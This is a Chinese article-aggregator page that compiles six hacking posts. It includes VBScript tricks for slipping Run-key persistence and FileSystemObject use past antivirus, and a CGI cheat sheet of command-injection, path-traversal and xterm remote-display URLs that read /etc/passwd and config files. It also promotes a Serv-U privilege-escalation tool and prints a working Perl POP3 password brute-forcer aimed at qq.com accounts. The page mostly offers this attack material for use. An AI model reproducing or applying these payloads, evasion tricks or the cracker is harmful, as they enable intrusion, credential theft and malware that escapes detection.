让脚本躲过杀毒软件脚本安全

时间:2023-08-31 07:41:06 其他范文 收藏本文 下载本文

让脚本躲过杀毒软件脚本安全(整理6篇)由网友“糖不知”投稿提供,以下是小编整理了让脚本躲过杀毒软件脚本安全,希望你喜欢,也可以帮助到您,欢迎分享!

让脚本躲过杀毒软件脚本安全

篇1:让脚本躲过杀毒软件脚本安全

现在杀毒的对vbs相当敏感,只要发现对注册表的xx作,或使用vbs运行命令(加用户) 就可能被杀,下面谈2方法可以简单解决:

1.使用连接符“&” 如:

Set CURObj = CreateObject(“WScript.Shell”)

mhk=“HK”&“LM\SOFT”&“WARE\Micr”&“osoft\Win”&“dows\Curren”&“tVersion\Run\”

CURObj.RegWrite “”&mhk&“internat.exe”,“internat.exe”

2.使用Execute函数(BY 动鲨 )

一些杀毒软件,如瑞星,他门会监视网页中的代码,一旦你创建了FSO或写注册表,即使是正常的脚本他也会报告危险,但是当年新欢乐时光也用了FSO怎么就没报警呢?原因是这个病毒使用Execute这个函数来躲过了防火墙,呵呵,

病毒将这段声明代码转化为字符串,然后通过Execute(String)函数执行,举个例子

str=“set fso=CreateObject( ” & chr(34) & “scrip” & chr(116)& “ing.FileSystemObject”&chr(34)&“)”

msgbox str

Execute str

将如上的代码放入test.vbs中就会被创建FSO,而瑞星就不会报警了。

篇2:让脚本躲过杀毒软件的方法

现在杀毒的对vbs相当敏感,只要发现对注册表的xx作,或使用vbs运行命令(加用户) 就可能被杀,

让脚本躲过杀毒软件的方法

下面谈2方法可以简单解决: 1.使用连接符 如: Set CURObj = CreateObject(WScript.Shell) mhk=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ CURObj.Re

篇3:关于defined脚本安全

很多php使用defined来防止外部直接访问php文件,从而保证了只让内部php文件include等调用,如下面:

//tag.php

if (!defined(“X”)) {

echo “You Cannot Access This Script. Directly, Have a Nice Day.”;

exit();

}

?>

这样的代码可以解决很多的安全问题,比如变量未定义[应该说在本文件内未定义]。

但是这样的在本地包含漏洞前就没什么意义了。比如进来看一代码

common.php文件里:

if ( !defined('X') )

{

die('Do not access this file directly.');

}

if ( !isset($root_path) )

{

$root_path = './';

}

require_once($root_path . 'config.php');

如果没有!defined('X') 的限制那么我们,这里$root_path未定义导致了一个远程包含,

而在改脚本又存在一个update-->include的2次攻击导致的本地包含,那么我们可以通过这个本地包含漏洞包含common.php导致突破!defined('X'),转化为远程包含。

篇4:CGI Hack脚本安全

总体思路,跳过限制,查看敏感文件和密码相关文件,写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着

cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权

感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们

注“

perl脚本的漏洞大多出在open()、system()或者 ''调用中。前者允许读写和执行,而后两个允许执行。

以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET

target.com/cgi-bin/home/news/sub.pl?12 随意构造

target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢

target.com/cgi-bin/home/news/sub.pl?`ls` 单引号

target.com/cgi-bin/home/news/sub.pl?`id`

target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`

target.com/cgi-bin/home/news/sub.pl?`cat<'/home1/siteadm/cgi-bin/home/news/sub.pl'` 非常好的思路,把代码cat回来显示

target.com/test.pl;ls|

target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|

target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|

target.com/test.pl?'id' 类似''内的操作和命令执行自己构造

比如:cat<'/home1/siteadm/cgi-bin/home/news/test.pl'` 把pl代码显示出来。

target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection

target.com/test.pl?&........ /../../etc/passwd

www.target.org/cgi-bin/club/scripts/userinfo.pl?user=./test 前面加./

www.target.org/cgi-bin/club/scripts/userinfo.pl?user=test%00 注意后面的 %00 别弄丢了

www.target.org/cgi-bin/club/scripts/userinfo.pl?user=../../../../etc/passwd%00

www.target.org/show.php?filename=../../../../../../../home/murong/include/config.php 查看php代码

www.target.org/show.php?filename=../../../../../../../home/murong/admin/global.php

emm和ps的一句话“

echo ”

www.target.org/cgi-bin/club/scripts/change_pw.pl?passwd0=1&passwd1=22&passwd2=22&key=../../../../../../../../bin/ls%20

>bbb%20|

www.target.org/cgi-bin/club/scripts\'less showpost.pl\' 并且寻找(用\'/\')\'SELECT\' 字符串

www.target.org/cgi-bin/club/scripts/..%c0%af../..%c0%af../bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征

www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin

相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法

target.com/#cmd.exe

target.com/?dummyparam=xp_cmdshell

lynx target.com/cgi-bin/htmlscript?../../../../etc/passwd

PS:很久前整理asp注射和php注射大全都是私下给好友的,不知道哪个马甲不够意思,就发了出去,

现在满bbs和各动画站点都能看到,而且

作者乱七八糟, 幸亏吃亏以后,再整理或者写的其他文章技巧,只给几个特好的朋友。再也不敢乱发了,用pinke话说,“我写/发现个东西我

容易吗,不知道怎么就被人做成动画或者教程,拿来赚钱也罢了,还要留一句话,没什么技术,黑站就这么简单.” 鄙视这些人们……有本事你

们自己写个lcx,或者什么shell去?我写不来,但是用朋友的,我也心安理得

篇5:HWay && ServU.php脚本安全

作者:linx

利用Serv-U的本地权限提升漏洞自动安装Hway!即使服务器的Serv-U密码被更改,只要ServUAdmin.exe可读,它便能读出更改后的密码.此外HWay && Serv-U.php还具有本地端口扫描的功能.

如果服务器的Serv-U的端口,密码都没有更改,那么直接点击”安装Hway”便可安装成功.否则请点击“获取Serv-U的管理员密码和端口”尝试获取更改后Serv-U的管理员密码和端口.

详细用法看压缩包内图文说明,

HWay && ServU.php脚本安全

blogimg.chinaunix.net/blog/upfile2/080712123643.rar

篇6:邮箱爆破脚本脚本安全

#!/usr/bin/perl

use Net::POP3;

$email=“pop.qq.com”;

$pop = Net::POP3->new($email)or die(“ERROR: Unable to initiate. ”);

print $pop->banner();

$pop->quit;

$i=0;

open(fp1,“user.txt”);

@array1=;

open(fp2,“pass.txt”);

@array2=;

foreach $a(@array1) {

$u=substr($a,0,length($a)-1);

$u=$u.“\@qq.com”;

foreach $b(@array2) {

$p=substr($b,0,length($b)-1);

print “cracked with ”.$u.“-----”.$p.“\n”;

$i=$i+1;

$pop = Net::POP3->new($email)or die(“ERROR: Unable to initiate. ”);

$m=$pop->login($u,$p);

if($m>0)

{

print $u.“------------”.$p.“----”.“success”.“\n”;

$pop->quit;

}

else

{

print $u.“------------”.$p.“----”.“failed”.“\n”;

$pop->quit;

}

}

}

print $i;

Echo 写入VBS提权

后门750字作文

伪科学:Mysql system函数提权

宣传片发言稿

教你做服务级的木马后门

脚本范文

WIN技巧:如何用ADSI实现自动化的活动目录操作

WIN技巧:ExchangeOutlookWebAccess疑难解答

《互联网软件应用于开发》教案11-12章

广告脚本范文

让脚本躲过杀毒软件脚本安全
《让脚本躲过杀毒软件脚本安全.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【让脚本躲过杀毒软件脚本安全(整理6篇)】相关文章:

IE发生内部错误,窗口被关闭2022-04-30

脚本 范文2024-03-06

scratch教案2022-12-15

你的任务应该被自动化:活动目录2023-09-10

影视制作实习总结2023-02-12

毕业设计中医范文2023-07-08

软件测试职业规划范文2022-05-07

毕业设计感悟2023-04-26

也谈跨站脚本攻击与防御脚本安全2023-12-17

毕业设计日志范文40篇2023-02-24

点击下载本文文档